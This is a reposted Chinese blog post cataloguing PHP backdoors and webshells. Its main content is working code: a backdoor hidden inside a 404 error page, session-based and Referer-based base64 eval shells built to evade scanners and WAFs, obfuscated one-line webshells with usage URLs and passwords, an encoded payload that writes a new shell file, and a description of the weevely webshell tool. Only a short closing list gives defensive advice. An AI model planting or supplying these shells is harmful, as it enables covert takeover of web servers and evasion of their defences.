[关闭]
@a5635268 2017-04-12T21:32:47.000000Z 字数 3043 阅读 1264

以学习心态看PHP后门代码【转】

PHP

利用404页面隐藏PHP小马

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

  1. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  2. <html><head>
  3. <title>404 Not Found</title>
  4. </head><body>
  5. <h1>Not Found</h1>
  6. <p>The requested URL was not found on this server.</p>
  7. </body></html>
  8. <?php
  9. @preg_replace("/[pageerror]/e",$_POST['error'],"saft");
  10. header('HTTP/1.1 404 Not Found');
  11. ?>

无特征隐藏PHP一句话:

  1. <?php
  2. session_start();
  3. $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
  4. $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门

  1. <?php 
  2.     $_GET[a]($_GET[b]);
  3. ?>
  5. # 使用方法:
  6. ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

层级请求,编码运行PHP后门

层级请求,编码运行PHP后门:

  1. //1.php
  2. header('Content-type:text/html;charset=utf-8');
  3. parse_str($_SERVER['HTTP_REFERER'], $a);
  4. if(reset($a) == '10' && count($a) == 9) {
  5.    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
  6. }
  8. //2.php
  9. header('Content-type:text/html;charset=utf-8');
  10. //要执行的代码
  11. $code = <<<CODE
  12. phpinfo();
  13. CODE;
  14. //进行base64编码
  15. $code = base64_encode($code);
  16. //构造referer字符串
  17. $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
  18. //后门url
  19. $url = 'http://localhost/test1/1.php';
  20. $ch = curl_init();
  21. $options = array(
  22.     CURLOPT_URL => $url,
  23.     CURLOPT_HEADER => FALSE,
  24.     CURLOPT_RETURNTRANSFER => TRUE,
  25.     CURLOPT_REFERER => $referer
  26. );
  27. curl_setopt_array($ch, $options);
  28. echo curl_exec($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。

三个变形的一句话PHP木马

  1. // 1
  2. <?php 
  3. ($_=@$_GET[2]).@$_($_POST[1])  //http://site/1.php?2=assert密码是1
  5. // 2
  6. <?php
  7. $_="";
  8. $_[+""]='';
  9. $_="$_"."";
  10. $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
  11. ?>
  12. <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
  13. # http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。
  16. // 3
  17. ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
  18. # str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

其他

  1. 1
  2. $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
  3. $hh("/[discuz]/e",$_POST['h'],"Access");
  5. 2
  6. $filename=$_GET['xbid'];
  7. include ($filename);
  8. //危险的include函数,直接编译任何文件为php格式运行
  10. 3
  11. $reg="c"."o"."p"."y";
  12. $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
  13. //重命名任何文件
  15. 4
  16. $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
  17. $gzid("/[discuz]/e",$_POST['h'],"Access");
  20. 5include ($uid);
  21. //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
  22. //gif插一句话

工具weevely

weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

总结

1,对PHP程序编写要有安全意识
2,服务器日志文件要经常看,经常备份
3,对每个站点进行严格的权限分配
4,对动态文件及目录经常批量安全审查
5,学会如何进行手工杀毒《即行为判断查杀》
6,时刻关注,或渗入活跃的网络安全营地
7,对服务器环境层级化处理,哪怕一个函数也可做规则

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注